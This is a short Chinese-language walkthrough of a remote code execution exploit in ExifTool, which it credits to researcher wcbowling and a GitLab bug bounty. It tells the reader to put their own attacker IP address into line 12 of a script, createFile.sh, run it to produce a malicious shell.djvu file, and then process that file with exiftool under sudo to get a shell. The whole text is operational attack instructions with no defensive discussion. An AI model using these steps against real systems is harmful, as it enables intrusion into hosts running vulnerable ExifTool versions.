最近,研究人员 wcbowling 发现 Exiftool 工具中存在一个漏洞,使得恶意攻击者能够执行远程代码执行攻击。该漏洞是在 Gitlab 漏洞赏金计划中发现的,他们在其产品中使用了该工具作为依赖项。
在第 12 行(createFile.sh)中,输入你自己的攻击机 IP 地址。

然后直接执行:
$ bash createFile.sh
这将创建恶意文件 shell.djvu。通过使用 exiftool,你可以获得远程代码执行:
$ sudo /usr/local/bin/exiftool shell.djvu